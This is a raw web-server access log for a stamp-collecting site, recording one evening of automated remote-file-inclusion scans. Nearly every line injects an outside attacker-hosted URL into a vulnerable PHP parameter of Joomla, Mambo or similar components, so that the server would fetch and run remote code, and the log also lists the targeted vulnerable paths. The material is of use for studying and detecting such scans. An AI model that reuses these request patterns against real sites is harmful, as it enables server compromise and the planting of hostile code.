121.88.4.5 - - [11/May/2008:19:18:49 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
194.85.92.127 - - [11/May/2008:19:20:39 -0700] "GET /logs/access_080407.log//skin/zero_vote/ask_password.php?dir=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.85.92.127 - - [11/May/2008:19:20:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.85.92.127 - - [11/May/2008:19:20:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
121.88.4.5 - - [11/May/2008:19:21:01 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
121.88.4.5 - - [11/May/2008:19:22:51 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.67.13.218 - - [11/May/2008:19:25:14 -0700] "GET /logs/access_080331.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
202.67.13.218 - - [11/May/2008:19:25:16 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
202.67.13.218 - - [11/May/2008:19:25:16 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
88.84.149.101 - - [11/May/2008:19:25:32 -0700] "GET /logs/access_080324.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
88.84.149.101 - - [11/May/2008:19:25:32 -0700] "GET /logs/access_080324.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
88.84.149.101 - - [11/May/2008:19:25:33 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
88.84.149.101 - - [11/May/2008:19:25:33 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
88.84.149.101 - - [11/May/2008:19:25:33 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
88.84.149.101 - - [11/May/2008:19:25:34 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
208.82.181.6 - - [11/May/2008:19:25:39 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.62.115.202 - - [11/May/2008:19:25:43 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.62.115.202 - - [11/May/2008:19:25:44 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.62.115.202 - - [11/May/2008:19:25:44 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
121.88.4.5 - - [11/May/2008:19:25:51 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
88.84.149.101 - - [11/May/2008:19:26:31 -0700] "GET /logs/access_080317.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
88.84.149.101 - - [11/May/2008:19:26:32 -0700] "GET /logs/access_080317.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
121.88.4.5 - - [11/May/2008:19:27:48 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
121.88.4.5 - - [11/May/2008:19:29:18 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
61.250.89.219 - - [11/May/2008:19:32:25 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
61.250.89.219 - - [11/May/2008:19:32:26 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
209.62.115.202 - - [11/May/2008:19:34:38 -0700] "GET /logs/access_080421.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.116.44.60 - - [11/May/2008:19:36:20 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
189.24.245.102 - - [11/May/2008:19:36:59 -0700] "GET //config/dbutil.bck.php?confdir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:38:06 -0700] "GET /logs/access_080303.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:38:07 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:38:07 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:38:36 -0700] "GET /logs/access_080331.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.205.67.241 - - [11/May/2008:19:38:37 -0700] "GET /componentscom_artlinksartlinks.dispnew.php?mosConfig_absolute_path=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.67.241 - - [11/May/2008:19:38:38 -0700] "GET /componentscom_artlinksartlinks.dispnew.php?mosConfig_absolute_path=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.116.44.60 - - [11/May/2008:19:42:37 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
193.34.150.208 - - [11/May/2008:19:43:08 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
193.34.150.208 - - [11/May/2008:19:43:09 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
72.36.138.74 - - [11/May/2008:19:51:40 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://61.19.234.26/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.mathstamps.com"
72.36.138.74 - - [11/May/2008:19:51:40 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://61.19.234.26/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.mathstamps.com"
67.19.216.122 - - [11/May/2008:19:52:21 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://61.19.234.26/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
67.19.216.122 - - [11/May/2008:19:52:25 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://61.19.234.26/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:52:56 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:52:56 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:52:56 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:52:56 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.90.127.34 - - [11/May/2008:19:54:24 -0700] "GET //config/dbutil.bck.php?confdir=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.116.44.60 - - [11/May/2008:19:55:21 -0700] "GET /logs/access_080414.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.116.44.60 - - [11/May/2008:19:55:22 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:55:33 -0700] "GET /logs/access_080128.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:55:34 -0700] "GET /logs/access_080128.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:55:34 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:55:34 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:55:44 -0700] "GET /logs/access_080128.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:55:44 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:55:44 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
206.225.84.178 - - [11/May/2008:19:55:44 -0700] "GET /logs/access_080331.log//include/SQuery/gameSpy2.php?libpath=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
206.225.84.178 - - [11/May/2008:19:55:44 -0700] "GET //include/SQuery/gameSpy2.php?libpath=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
206.225.84.178 - - [11/May/2008:19:55:44 -0700] "GET /logs//include/SQuery/gameSpy2.php?libpath=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:57 -0700] "GET /logs/access_080331.log//include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:57 -0700] "GET //include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:57 -0700] "GET /logs//include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:57 -0700] "GET /logs/access_080331.log//include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:58 -0700] "GET /logs/access_080331.log//include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:58 -0700] "GET //include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:58 -0700] "GET //include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:58 -0700] "GET /logs//include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:58 -0700] "GET /logs//include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:59 -0700] "GET /logs/access_080331.log//include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:59 -0700] "GET //include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.73.66 - - [11/May/2008:19:55:59 -0700] "GET /logs//include/SQuery/gameSpy2.php?libpath=http://casinojeton.de/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:56:48 -0700] "GET /logs/access_080505.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:56:48 -0700] "GET /logs/access_080505.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:19:56:53 -0700] "GET /logs/access_080505.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.49.148.182 - - [11/May/2008:19:57:25 -0700] "GET /logs/access_080331.log//include/SQuery/gameSpy2.php?libpath=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.49.148.182 - - [11/May/2008:19:57:26 -0700] "GET //include/SQuery/gameSpy2.php?libpath=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.49.148.182 - - [11/May/2008:19:57:26 -0700] "GET /logs//include/SQuery/gameSpy2.php?libpath=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.49.148.182 - - [11/May/2008:19:57:31 -0700] "GET /logs/access_080331.log//include/SQuery/gameSpy2.php?libpath=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.49.148.182 - - [11/May/2008:19:57:31 -0700] "GET //include/SQuery/gameSpy2.php?libpath=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.49.148.182 - - [11/May/2008:19:57:31 -0700] "GET /logs//include/SQuery/gameSpy2.php?libpath=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.116.44.60 - - [11/May/2008:19:58:17 -0700] "GET /logs/access_080414.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.116.44.60 - - [11/May/2008:19:58:17 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
128.233.109.82 - - [11/May/2008:19:58:55 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://oxxiah.net/zeroboard/styles/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
128.233.109.82 - - [11/May/2008:19:58:55 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://oxxiah.net/zeroboard/styles/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
80.90.127.34 - - [11/May/2008:19:59:09 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.90.127.34 - - [11/May/2008:19:59:09 -0700] "GET //config/dbutil.bck.php?confdir=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.90.127.34 - - [11/May/2008:19:59:10 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:19:59:43 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:19:59:43 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:19:59:43 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:19:59:43 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:19:59:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:19:59:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:19:59:45 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:19:59:48 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:19:59:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:20:00:01 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:20:00:02 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:20:00:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:20:00:11 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:20:00:11 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:20:00:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:20:00:18 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.69.227 - - [11/May/2008:20:00:18 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
